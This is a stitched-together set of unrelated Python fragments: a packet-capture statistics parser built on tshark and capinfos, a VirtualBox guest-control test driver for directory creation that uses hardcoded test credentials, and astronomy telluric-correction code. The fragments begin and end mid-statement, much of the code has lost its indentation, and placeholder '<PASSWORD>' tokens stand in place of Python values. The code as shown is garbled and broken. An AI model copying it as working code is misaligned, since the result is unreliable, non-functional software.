                field, value = line.split(' = ')
                iface_dict[iface_name][field.strip()] = value.strip()
        else:
            field, value = line.split(':', 1)
            results['capinfos'][field.strip()] = value.strip()
    results['capinfos']['interfaces'] = iface_dict
    print(results)
    return results
def run_capinfos(path):
    """Run `capinfos` on *path* and return the parsed stats.

    Returns None for an empty capture file; command failures are logged
    and yield the parse of an empty string.
    """
    if os.path.getsize(path) == 0:
        print("pcap file empty, no stats")
        return
    output = ''
    try:
        cmd = shlex.split(' '.join(['capinfos', path]))
        output = subprocess.check_output(cmd).decode("utf-8")
    except Exception as e:
        print(str(e))
    return parse_capinfos(output)
def get_asn(endpoint):
    """Look up the ASN for *endpoint* via the asn.sh helper script.

    Returns the stripped script output, or '' when the lookup fails
    (failure is logged, not raised).
    """
    result = ''
    try:
        cmd = shlex.split(' '.join(['bash', 'asn.sh', endpoint]))
        result = subprocess.check_output(cmd).decode("utf-8").strip()
    except Exception as e:
        print(str(e))
    return result
def get_ether_vendor(mac, lookup_path='nmap-mac-prefixes.txt'):
    """
    Takes a MAC address and looks up and returns the vendor for it.

    :param mac: MAC address such as '00:11:22:33:44:55' (only the first
                three octets -- the OUI -- are used for the lookup).
    :param lookup_path: nmap-style prefix file; each line is a 6-hex-digit
                        prefix followed by the vendor name.
    :return: vendor name, or 'Unknown' when the prefix is absent or the
             lookup file cannot be read.
    """
    mac = ''.join(mac.split(':'))[:6].upper()
    try:
        with open(lookup_path, 'r') as f:
            for line in f:
                if line.startswith(mac):
                    # BUG FIX: split(None, 1) keeps multi-word vendor names
                    # ('Cisco Systems'); split()[1] dropped everything after
                    # the first word.
                    return line.split(None, 1)[1].strip()
    except Exception:  # pragma: no cover
        return 'Unknown'
    # BUG FIX: previously fell off the end (returning None) when the file
    # was readable but contained no matching prefix.
    return 'Unknown'
def parse_tshark(output):
    """Parse the combined text output of tshark's '-z' statistics reports.

    *output* is the stdout produced by run_tshark(): a sequence of report
    blocks (conversations, endpoints, ICMP round-trip stats, DNS tree,
    protocol hierarchy), each framed by lines of '==='.

    :param output: raw tshark text output.
    :return: {'tshark': {report name: parsed structure}} -- lists of dicts
             for conversations/endpoints, a dict for ICMP stats, a nested
             dict for the protocol hierarchy, plus condensed TCP/UDP
             conversation summaries appended at the end.
    """
    results = {'tshark': {}}
    # ---- Phase 1: split raw output into named blocks framed by '===' ----
    in_block = False
    name = None
    for line in output.split('\n'):
        if line.startswith('==='):
            if in_block:
                # Closing frame: current report block is finished.
                in_block = False
                name = None
                continue
            else:
                # Opening frame: the next line carries the report title.
                in_block = True
                continue
        if in_block:
            if not name:
                # First line inside the frame is the report name (':' dropped).
                name = ''.join(line.split(':')).strip()
                results['tshark'][name] = ''
                continue
            elif not line.startswith('Filter:') and line != '':
                # Accumulate the block body as raw text for phase 2.
                results['tshark'][name] += line + '\n'
    # ---- Phase 2: parse each accumulated block by its report type ----
    for result in results['tshark'].keys():
        if 'Conversations' in result:
            # handle conversation parsing
            conversations = []
            for line in results['tshark'][result].split('\n'):
                if line == '' or line.startswith(' '):
                    # header or padding, discard
                    continue
                else:
                    # Fixed 11-column tshark conversation row.
                    src, _, dst, frames_l, bytes_l, frames_r, bytes_r, frames_total, bytes_total, rel_start, duration = line.split()
                    conv = {'Source': src, 'Destination': dst, 'Frames to Source': frames_l, 'Bytes to Source': bytes_l, 'Frames to Destination': frames_r, 'Bytes to Destination': bytes_r, 'Total Frames': frames_total, 'Total Bytes': bytes_total, 'Relative Start': rel_start, 'Duration': duration}
                    if 'Ethernet' in result:
                        # MAC-level rows: annotate with NIC vendor lookups.
                        conv['Source Vendor'] = get_ether_vendor(src)
                        conv['Destination Vendor'] = get_ether_vendor(dst)
                    conversations.append(conv)
            results['tshark'][result] = conversations
        elif 'Endpoints' in result:
            # handle endpoint parsing
            endpoints = []
            for line in results['tshark'][result].split('\n'):
                if line == '' or line.startswith(' '):
                    # header or padding, discard
                    continue
                else:
                    # handle endpoint services with ports
                    if result.startswith('UDP') or result.startswith('TCP') or result.startswith('STCP'):
                        endpoint, port, packet_count, byte_count, tx_packets, tx_bytes, rx_packets, rx_bytes = line.split()
                        conv = {'Endpoint': endpoint, 'Port': port, 'Packets': packet_count, 'Bytes': byte_count, 'Tx Packets': tx_packets, 'Tx Bytes': tx_bytes, 'Rx Packets': rx_packets, 'Rx Bytes': rx_bytes}
                    else:
                        # Port-less endpoint row (Ethernet, IP, ...).
                        endpoint, packet_count, byte_count, tx_packets, tx_bytes, rx_packets, rx_bytes = line.split()
                        conv = {'Endpoint': endpoint, 'Packets': packet_count, 'Bytes': byte_count, 'Tx Packets': tx_packets, 'Tx Bytes': tx_bytes, 'Rx Packets': rx_packets, 'Rx Bytes': rx_bytes}
                    if 'Ethernet' in result:
                        conv['Endpoint Vendor'] = get_ether_vendor(endpoint)
                    endpoints.append(conv)
            results['tshark'][result] = endpoints
        else:
            # handle weird stuff (ICMP/ICMPv6 stats, protocol tree, DNS)
            for line in results['tshark'][result].split('\n'):
                if line == '' or line.startswith(' '):
                    # header or padding, discard
                    continue
                else:
                    # handle icmp and icmpv6
                    if result.startswith('ICMP'):
                        # Replace the accumulated raw string with a dict the
                        # first time a data row is seen.
                        if isinstance(results['tshark'][result], str):
                            results['tshark'][result] = {}
                        if line.startswith('Requests') or line.startswith('Minimum'):
                            # header
                            continue
                        else:
                            values = line.split()
                            if len(values) == 4:
                                # Request/reply/loss summary row.
                                requests, replies, lost, percent_loss = values
                                results['tshark'][result]['Requests'] = requests
                                results['tshark'][result]['Replies'] = replies
                                results['tshark'][result]['Lost'] = lost
                                results['tshark'][result]['% Loss'] = percent_loss
                            else:
                                # Round-trip-time statistics row.
                                minimum, maximum, mean, median, s_deviation, min_frame, max_frame = values
                                results['tshark'][result]['Minimum'] = minimum
                                results['tshark'][result]['Maximum'] = maximum
                                results['tshark'][result]['Mean'] = mean
                                results['tshark'][result]['Median'] = median
                                results['tshark'][result]['Standard Deviation'] = s_deviation
                                results['tshark'][result]['Minimum Frame'] = min_frame
                                results['tshark'][result]['Maximum Frame'] = max_frame
                    elif result.startswith('Protocol'):
                        # TODO
                        continue
                    # handle dns
                    elif result.startswith('DNS'):
                        # TODO
                        continue
    # TODO temporarily remove until parsed
    if 'DNS' in results['tshark']:
        del results['tshark']['DNS']
    # handle protocol hierarchy stats
    # The indented protocol tree is rebuilt as a JSON string whose nesting
    # follows the rows' space counts, then loaded back into a dict.
    a = []
    if 'Protocol Hierarchy Statistics' in results['tshark']:
        a = results['tshark']['Protocol Hierarchy Statistics'].split('\n')
    h = []
    for line in a:
        if line != '':
            # Each row: '<indented name> frames:<n> bytes:<n>'.
            name, frame_count, byte_count = line.rsplit(' ', 2)
            name = name.rstrip()
            frame_count = frame_count.split(':')[1]
            byte_count = byte_count.split(':')[1]
            h.append([name, frame_count, byte_count])
    i = 1
    spaces = 0
    if h:
        h[0][0] = '"' + h[0][0].strip()
        while i < len(h):
            prev_spaces = spaces
            # Space count of the next row decides whether the previous entry
            # opens a nested object, stays a sibling, or closes levels.
            spaces = h[i][0].count(' ')
            h[i-1][0] = h[i-1][0].strip() + '":{"Frames": "' + h[i-1][1] + '", "Bytes": "' + h[i-1][2]
            if spaces > prev_spaces:
                h[i-1][0] += '","'
            elif spaces == prev_spaces:
                h[i-1][0] += '"},"'
            else:
                h[i-1][0] += '"}' + ('}'*(prev_spaces-spaces)) + ',"'
            i += 1
        prev_spaces = spaces
        spaces = h[-1][0].count(' ')
        # Close out the last entry and any still-open nesting levels.
        h[i-1][0] = h[i-1][0].strip() + '":{"Frames": "' + h[i-1][1] + '", "Bytes": "' + h[i-1][2] + '"}' + ('}'*(prev_spaces))
        protocol_str = '{'
        for record in h:
            protocol_str += record[0]
        protocol_str += '}'
        results['tshark']['Protocol Hierarchy Statistics'] = json.loads(protocol_str)
    # add in condensed conversation fields
    results['tshark']['Condensed TCP Conversations'] = condense_conversations(results, 'TCP Conversations')
    results['tshark']['Condensed UDP Conversations'] = condense_conversations(results, 'UDP Conversations')
    print(results)
    return results
def condense_conversations(results, conv_type):
    """Collapse parsed tshark conversations into one record per source IP.

    Each source IP maps to its unique destination IPs, unique source and
    destination ports, and an ASN lookup (performed once per source IP).

    :param results: parse_tshark() output containing results['tshark'].
    :param conv_type: key such as 'TCP Conversations' or 'UDP Conversations'.
    :return: {src_ip: {'Destinations': [...], 'Source Ports': [...],
                       'Destination Ports': [...], 'ASN': ...}}
    """
    prot_ip_map = {}
    if conv_type not in results['tshark']:
        return prot_ip_map
    for conversation in results['tshark'][conv_type]:
        src_ip, src_port = conversation['Source'].rsplit(':', 1)
        dst_ip, dst_port = conversation['Destination'].rsplit(':', 1)
        if src_ip not in prot_ip_map:
            # First sighting of this source: do the ASN lookup once.
            prot_ip_map[src_ip] = {'Destinations': [], 'Source Ports': [],
                                   'Destination Ports': [], 'ASN': get_asn(src_ip)}
        entry = prot_ip_map[src_ip]
        if src_port not in entry['Source Ports']:
            entry['Source Ports'].append(src_port)
        if dst_port not in entry['Destination Ports']:
            entry['Destination Ports'].append(dst_port)
        if dst_ip not in entry['Destinations']:
            entry['Destinations'].append(dst_ip)
    return prot_ip_map
def run_tshark(path):
    """Run tshark statistics passes over *path* and return the parsed results.

    Returns None for an empty capture file; command failures are logged and
    yield the parse of an empty string.
    """
    if os.path.getsize(path) == 0:
        print("pcap file empty, no stats")
        return
    results = {}
    output = ''
    try:
        conv_endpoint_types = ['bluetooth', 'eth', 'fc', 'fddi', 'ip', 'ipv6',
                               'ipx', 'jxta', 'ncp', 'rsvp', 'sctp', 'tcp',
                               'tr', 'usb', 'udp', 'wlan']
        options = '-n -q -z dns,tree -z io,phs -z icmp,srt -z icmpv6,srt'
        # BUG FIX: str.join only inserts the separator *between* items, so
        # the old `' -z conv,'.join(types)` glued the first type directly
        # onto the previous option ('...icmpv6,srtbluetooth') and never
        # emitted '-z conv,'/'-z endpoints,' for it. Build each flag
        # explicitly instead.
        options += ''.join(' -z conv,' + t for t in conv_endpoint_types)
        options += ''.join(' -z endpoints,' + t for t in conv_endpoint_types)
        output = subprocess.check_output(shlex.split(' '.join(['tshark', '-r', path, options])))
        output = output.decode("utf-8")
    except Exception as e:
        print(str(e))
    results = parse_tshark(output)
    return results
if __name__ == '__main__': # pragma: no cover
path = get_path()
uid = ''
if 'id' in os.environ:
uid = os.environ['id']
if path:
if 'rabbit' in os.environ and os.environ['rabbit'] == 'true':
try:
channel = connect_rabbit()
capinfos_results = run_capinfos(path)
body = {'id': uid, 'type': 'metadata', 'file_path': path, 'data': capinfos_results, 'results': {'tool': 'pcap-stats', 'version': get_version()}}
send_rabbit_msg(body, channel)
tshark_results = run_tshark(path)
body = {'id': uid, 'type': 'metadata', 'file_path': path, 'data': tshark_results, 'results': {'tool': 'pcap-stats', 'version': get_version()}}
send_rabbit_msg(body, channel)
text_results = striptxt_pcap(path)
body = | |
which will be killed by VBoxService on the
# guest because it ran out of execution time (5 seconds).
if fRc:
try:
curProc = oGuestSession.processCreate(sImage, [sImage,] if self.oTstDrv.fpApiVer >= 5.0 else [], \
[], [], 5 * 1000);
reporter.log('Waiting for process 2 being started ...');
waitRes = curProc.waitForArray([ vboxcon.ProcessWaitForFlag_Start ], 30 * 1000);
if waitRes != vboxcon.ProcessWaitResult_Start:
reporter.error('Waiting for process 1 to start failed, got status %d');
fRc = False;
if fRc:
reporter.log('Waiting for process 2 to get killed because it ran out of execution time ...');
waitRes = curProc.waitForArray([ vboxcon.ProcessWaitForFlag_Terminate ], 30 * 1000);
if waitRes != vboxcon.ProcessWaitResult_Timeout:
reporter.error('Waiting for process 2 did not time out when it should, got wait result %d' \
% (waitRes,));
fRc = False;
if fRc:
reporter.log('Waiting for process 2 indicated an error, good');
if curProc.status != vboxcon.ProcessStatus_TimedOutKilled:
reporter.error('Status of process 2 wrong; excepted %d, got %d' \
% (vboxcon.ProcessStatus_TimedOutKilled, curProc.status));
fRc = False;
else:
reporter.log('Status of process 2 correct (%d)' % (vboxcon.ProcessStatus_TimedOutKilled,));
## @todo Add curProc.terminate() as soon as it's implemented.
except:
reporter.errorXcpt('Exception for process 2:');
fRc = False;
oGuestSession.close();
except:
reporter.errorXcpt('Could not handle session:');
fRc = False;
return (fRc, oTxsSession);
def testGuestCtrlDirCreate(self, oSession, oTxsSession, oTestVm):
    """
    Tests creation of guest directories.

    Builds a table of directory-creation sub-tests (invalid/empty paths,
    relative escapes, non-existing drives and UNC shares, nested creation
    with DirectoryCreateFlag_Parents, and long randomly-named paths), runs
    each against a fresh guest control session, and compares the outcome
    with its expected tdTestResult.

    Returns (fRc, oTxsSession) where fRc is the overall success status.
    """
    # NOTE(review): the '<PASSWORD>' tokens below are scrubbed credential
    # placeholders (the literal is not valid Python) -- restore the
    # intended sPassword references before running this test driver.
    if oTestVm.isWindows():
        sUser = "Administrator";
    else:
        sUser = "vbox";
    sPassword = "password";
    if oTestVm.isWindows():
        # Scratch area on the guest used by the creation sub-tests.
        # NOTE(review): sScratch is only defined for Windows guests but is
        # referenced unconditionally by the Windows-only test table below.
        sScratch = "C:\\Temp\\vboxtest\\testGuestCtrlDirCreate\\";
    aaTests = [];
    if oTestVm.isWindows():
        aaTests.extend([
            # Invalid stuff.
            [ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = '' ),
              tdTestResult(fRc = False) ],
            # More unusual stuff.
            [ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = '..\\..\\' ),
              tdTestResult(fRc = False) ],
            [ tdTestDirCreate(sUser = sUser, sPassword = sPassword, sDirectory = '../../' ),
              tdTestResult(fRc = False) ],
            [ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = 'z:\\' ),
              tdTestResult(fRc = False) ],
            [ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = '\\\\uncrulez\\foo' ),
              tdTestResult(fRc = False) ],
            # Creating directories.
            [ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = sScratch ),
              tdTestResult(fRc = False) ],
            [ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = os.path.join(sScratch, 'foo\\bar\\baz'),
                              aFlags = [ vboxcon.DirectoryCreateFlag_Parents ] ),
              tdTestResult(fRc = True) ],
            # Creating the same nested path twice must also succeed.
            [ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>, sDirectory = os.path.join(sScratch, 'foo\\bar\\baz'),
                              aFlags = [ vboxcon.DirectoryCreateFlag_Parents ] ),
              tdTestResult(fRc = True) ],
            # Long (+ random) stuff.
            [ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>,
                              sDirectory = os.path.join(sScratch,
                                                        "".join(random.choice(string.ascii_lowercase) for i in range(32))) ),
              tdTestResult(fRc = True) ],
            [ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>,
                              sDirectory = os.path.join(sScratch,
                                                        "".join(random.choice(string.ascii_lowercase) for i in range(128))) ),
              tdTestResult(fRc = True) ],
            # Following two should fail on Windows (paths too long). Both should timeout.
            [ tdTestDirCreate(sUser = sUser, sPassword = <PASSWORD>,
                              sDirectory = os.path.join(sScratch,
                                                        "".join(random.choice(string.ascii_lowercase) for i in range(255))) ),
              tdTestResult(fRc = False) ],
            [ tdTestDirCreate(sUser = sUser, sPassword = sPassword,
                              sDirectory = os.path.join(sScratch,
                                                        "".join(random.choice(string.ascii_lowercase) for i in range(1024)))
                              ),
              tdTestResult(fRc = False) ]
        ]);
    else:
        reporter.log('No OS-specific tests for non-Windows yet!');
    fRc = True;
    for (i, aTest) in enumerate(aaTests):
        curTest = aTest[0]; # tdTestExec, use an index, later.
        curRes = aTest[1]; # tdTestResult
        reporter.log('Testing #%d, sDirectory="%s" ...' % (i, curTest.sDirectory));
        curTest.setEnvironment(oSession, oTxsSession, oTestVm);
        # Each sub-test runs in its own guest session.
        fRc, curGuestSession = curTest.createSession('testGuestCtrlDirCreate: Test #%d' % (i,));
        if fRc is False:
            reporter.error('Test #%d failed: Could not create session' % (i,));
            break;
        fRc = self.gctrlCreateDir(curTest, curRes, curGuestSession);
        curTest.closeSession();
        if fRc is False:
            reporter.error('Test #%d failed' % (i,));
            fRc = False;
            break;
    return (fRc, oTxsSession);
def testGuestCtrlDirCreateTemp(self, oSession, oTxsSession, oTestVm): # pylint: disable=R0914
"""
Tests creation of temporary directories.
"""
if oTestVm.isWindows():
sUser = "Administrator";
else:
sUser = "vbox";
sPassword = "password";
# if oTestVm.isWindows():
# sScratch = "C:\\Temp\\vboxtest\\testGuestCtrlDirCreateTemp\\";
aaTests = [];
if oTestVm.isWindows():
aaTests.extend([
# Invalid stuff.
[ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sDirectory = ''),
tdTestResult(fRc = False) ],
[ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sDirectory = 'C:\\Windows',
fMode = 1234),
tdTestResult(fRc = False) ],
[ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = '',
sDirectory = 'C:\\Windows', fMode = 1234),
tdTestResult(fRc = False) ],
[ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'xXx',
sDirectory = 'C:\\Windows', fMode = 0700),
tdTestResult(fRc = False) ],
[ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'xxx',
sDirectory = 'C:\\Windows', fMode = 0700),
tdTestResult(fRc = False) ],
# More unusual stuff.
[ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'foo',
sDirectory = 'z:\\'),
tdTestResult(fRc = False) ],
[ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'foo',
sDirectory = '\\\\uncrulez\\foo'),
tdTestResult(fRc = False) ],
# Non-existing stuff.
[ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'bar',
sDirectory = 'c:\\Apps\\nonexisting\\foo'),
tdTestResult(fRc = False) ],
# FIXME: Failing test. Non Windows path
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'bar',
# sDirectory = '/tmp/non/existing'),
# tdTestResult(fRc = False) ]
]);
else:
reporter.log('No OS-specific tests for non-Windows yet!');
# FIXME: Failing tests.
# aaTests.extend([
# Non-secure variants.
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'X',
# sDirectory = sScratch),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'X',
# sDirectory = sScratch),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fMode = 0700),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fMode = 0700),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'XXX',
# sDirectory = sScratch,
# fMode = 0755),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fMode = 0755),
# tdTestResult(fRc = True) ],
# Secure variants.
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch, fSecure = True),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch, fSecure = True),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch, fSecure = True),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = sPassword, sTemplate = 'XXX',
# sDirectory = sScratch, fSecure = True),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fSecure = True, fMode = 0700),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fSecure = True, fMode = 0700),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fSecure = True, fMode = 0755),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = 'XXX',
# sDirectory = sScratch,
# fSecure = True, fMode = 0755),
# tdTestResult(fRc = True) ],
# Random stuff.
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>,
# sTemplate = "XXX-".join(random.choice(string.ascii_lowercase) for i in range(32)),
# sDirectory = sScratch,
# fSecure = True, fMode = 0755),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = "".join('X' for i in range(32)),
# sDirectory = sScratch,
# fSecure = True, fMode = 0755),
# tdTestResult(fRc = True) ],
# [ tdTestDirCreateTemp(sUser = sUser, sPassword = <PASSWORD>, sTemplate = "".join('X' for i in range(128)),
# sDirectory = sScratch,
# fSecure = True, fMode = 0755),
# tdTestResult(fRc = True) ]
# ]);
fRc = True;
for (i, aTest) in enumerate(aaTests):
curTest = aTest[0]; # tdTestExec, use an index, later.
curRes = | |
= pcheck(params, 'TELLUP_TRANS_SIGLIM', 'trans_siglim', kwargs,
func_name)
force_airmass = pcheck(params, 'TELLUP_FORCE_AIRMASS', 'force_airmass',
kwargs, func_name)
others_bounds = pcheck(params, 'TELLUP_OTHER_BOUNDS', 'others_bounds',
kwargs, func_name, mapf='list', dtype=float)
water_bounds = pcheck(params, 'TELLUP_WATER_BOUNDS', 'water_bounds', kwargs,
func_name, mapf='list', dtype=float)
ker_thres = pcheck(params, 'TELLUP_ABSO_EXPO_KTHRES', 'ker_thres', kwargs,
func_name)
wavestart = pcheck(params, 'EXT_S1D_WAVESTART', 'wavestart', kwargs,
func_name)
waveend = pcheck(params, 'EXT_S1D_WAVEEND', 'waveend', kwargs, func_name)
dvgrid = pcheck(params, 'EXT_S1D_BIN_UVELO', 'dvgrid', kwargs, func_name)
# ----------------------------------------------------------------------
# get image and header from infile
header = infile.header
# get airmass from header
hdr_airmass = infile.get_key('KW_AIRMASS', dtype=float)
# copy e2ds input image
image_e2ds_ini = np.array(infile.data)
# get shape of the e2ds
nbo, nbpix = image_e2ds_ini.shape
# get wave map for the input e2ds
wave_e2ds = wprops['WAVEMAP']
# ----------------------------------------------------------------------
# define storage of quality control
qc_values, qc_names, qc_logic, qc_pass = [], [], [], []
# need to add dummy values for these qc
# 1. snr < snr_min_thres (pos = 0)
qc_values.append(np.nan)
qc_names.append('EXTSNR')
qc_logic.append('EXTSNR < {0}'.format(snr_min_thres))
qc_pass.append(np.nan)
# 2. ccf is NaN (pos = 1)
qc_values.append(np.nan)
qc_names.append('NUM_NAN_CCF')
qc_logic.append('NUM_NAN_CCF > 0')
qc_pass.append(np.nan)
# 3. exponent for others out of bounds (pos = 2 and 3)
qc_values += [np.nan, np.nan]
qc_names += ['EXPO_OTHERS L', 'EXPO_OTHERS U']
qc_logic += ['EXPO_OTHERS L < {0}'.format(others_bounds[0]),
'EXPO_OTHERS U > {0}'.format(others_bounds[1])]
qc_pass += [np.nan, np.nan]
# 4. exponent for water out of bounds (pos 4 and 5)
qc_values += [np.nan, np.nan]
qc_names += ['EXPO_WATER L', 'EXPO_WATER U']
qc_logic += ['EXPO_WATER L < {0}'.format(water_bounds[0]),
'EXPO_WATER U > {0}'.format(water_bounds[1])]
qc_pass += [np.nan, np.nan]
# 5. max iterations exceeded (pos = 6)
qc_values.append(np.nan)
qc_names.append('ITERATIONS')
qc_logic.append('ITERATIONS = {0}'.format(max_iterations - 1))
qc_pass.append(np.nan)
# dev note: if adding a new one must add tfailmsgs for all uses in qc
# (mk_tellu and fit_tellu)
# ----------------------------------------------------------------------
# remove OH lines if required
if clean_ohlines:
image_e2ds, sky_model = clean_ohline_pca(params, image_e2ds_ini,
wave_e2ds)
# else just copy the image and set the sky model to zeros
else:
image_e2ds = np.array(image_e2ds_ini)
sky_model = np.zeros_like(image_e2ds_ini)
# ----------------------------------------------------------------------
if not do_precleaning:
# log progress
WLOG(params, '', TextEntry('10-019-00008'))
# populate qc params
qc_params = [qc_names, qc_values, qc_logic, qc_pass]
# populate parameter dictionary
props = ParamDict()
props['CORRECTED_E2DS'] = image_e2ds
props['TRANS_MASK'] = np.ones_like(image_e2ds_ini).astype(bool)
props['ABSO_E2DS'] = np.ones_like(image_e2ds_ini)
props['SKY_MODEL'] = sky_model
props['EXPO_WATER'] = np.nan
props['EXPO_OTHERS'] = np.nan
props['DV_WATER'] = np.nan
props['DV_OTHERS'] = np.nan
props['CCFPOWER_WATER'] = np.nan
props['CCFPOWER_OTHERS'] = np.nan
props['QC_PARAMS'] = qc_params
# set sources
keys = ['CORRECTED_E2DS', 'TRANS_MASK', 'ABSO_E2DS', 'EXPO_WATER',
'EXPO_OTHERS', 'DV_WATER', 'DV_OTHERS', 'CCFPOWER_WATER',
'CCFPOWER_OTHERS', 'QC_PARAMS', 'SKY_MODEL']
props.set_sources(keys, func_name)
# ------------------------------------------------------------------
# add constants used (can come from kwargs)
props['TELLUP_DO_PRECLEANING'] = do_precleaning
props['TELLUP_D_WATER_ABSO'] = default_water_abso
props['TELLUP_CCF_SCAN_RANGE'] = ccf_scan_range
props['TELLUP_CLEAN_OH_LINES'] = clean_ohlines
props['TELLUP_REMOVE_ORDS'] = remove_orders
props['TELLUP_SNR_MIN_THRES'] = snr_min_thres
props['TELLUP_DEXPO_CONV_THRES'] = dexpo_thres
props['TELLUP_DEXPO_MAX_ITR'] = max_iterations
props['TELLUP_ABSO_EXPO_KWID'] = ker_width
props['TELLUP_ABSO_EXPO_KEXP'] = ker_shape
props['TELLUP_TRANS_THRES'] = trans_thres
props['TELLUP_TRANS_SIGLIM'] = trans_siglim
props['TELLUP_FORCE_AIRMASS'] = force_airmass
props['TELLUP_OTHER_BOUNDS'] = others_bounds
props['TELLUP_WATER_BOUNDS'] = water_bounds
props['TELLUP_ABSO_EXPO_KTHRES'] = ker_thres
props['TELLUP_WAVE_START'] = wavestart
props['TELLUP_WAVE_END'] = waveend
props['TELLUP_DVGRID'] = dvgrid
# set sources
keys = ['TELLUP_D_WATER_ABSO', 'TELLUP_CCF_SCAN_RANGE',
'TELLUP_CLEAN_OH_LINES', 'TELLUP_REMOVE_ORDS',
'TELLUP_SNR_MIN_THRES', 'TELLUP_DEXPO_CONV_THRES',
'TELLUP_DEXPO_MAX_ITR', 'TELLUP_ABSO_EXPO_KWID',
'TELLUP_ABSO_EXPO_KEXP', 'TELLUP_TRANS_THRES',
'TELLUP_TRANS_SIGLIM', 'TELLUP_FORCE_AIRMASS',
'TELLUP_OTHER_BOUNDS', 'TELLUP_WATER_BOUNDS',
'TELLUP_ABSO_EXPO_KTHRES', 'TELLUP_WAVE_START',
'TELLUP_WAVE_END', 'TELLUP_DVGRID', 'TELLUP_DO_PRECLEANING']
props.set_sources(keys, func_name)
# ------------------------------------------------------------------
# return props
return props
# ----------------------------------------------------------------------
# we ravel the wavelength grid to make it a 1d array of increasing
# wavelength. We will trim the overlapping domain between orders
keep = np.ones_like(wave_e2ds).astype(bool)
# keep track of where orders are
orders, _ = np.indices(wave_e2ds.shape)
# loop around 2nd to last-1 order and compare -1th and +1th order
for order_num in range(1, nbo - 1):
        # get wavelengths not in order before
before = wave_e2ds[order_num] > wave_e2ds[order_num - 1][::-1]
# get wavelengths not in order after
after = wave_e2ds[order_num] < wave_e2ds[order_num + 1][::-1]
# combine mask
keep[order_num] = before & after
# set whole first order to zeros (rejected)
keep[0] = np.zeros(nbpix).astype(bool)
# set whole last order to zeros (rejected)
keep[-1] = np.zeros(nbpix).astype(bool)
# ----------------------------------------------------------------------
# force into 1D and apply keep map
flatkeep = keep.ravel()
wavemap = wave_e2ds.ravel()[flatkeep]
spectrum = image_e2ds.ravel()[flatkeep]
spectrum_ini = image_e2ds_ini.ravel()[flatkeep]
orders = orders.ravel()[flatkeep]
# ----------------------------------------------------------------------
# load tapas in correct format
spl_others, spl_water = load_tapas_spl(params, recipe, header)
# ----------------------------------------------------------------------
# load the snr from e2ds file
snr = infile.read_header_key_1d_list('KW_EXT_SNR', nbo, dtype=float)
# remove infinite / NaN snr
snr[~np.isfinite(snr)] = 0.0
# remove snr from these orders (due to thermal background)
for order_num in remove_orders:
snr[order_num] = 0.0
    # make sure we have at least one order above the min snr requirement
if np.nanmax(snr) < snr_min_thres:
# update qc params
qc_values[0] = np.nanmax(snr)
qc_pass[0] = 0
qc_params = [qc_names, qc_values, qc_logic, qc_pass]
# return qc_exit_tellu_preclean
return qc_exit_tellu_preclean(params, recipe, image_e2ds, infile,
wave_e2ds, qc_params, sky_model)
else:
qc_values[0] = np.nanmax(snr)
qc_pass[0] = 1
# mask all orders below min snr
for order_num in range(nbo):
# only mask if snr below threshold
if snr[order_num] < snr_min_thres:
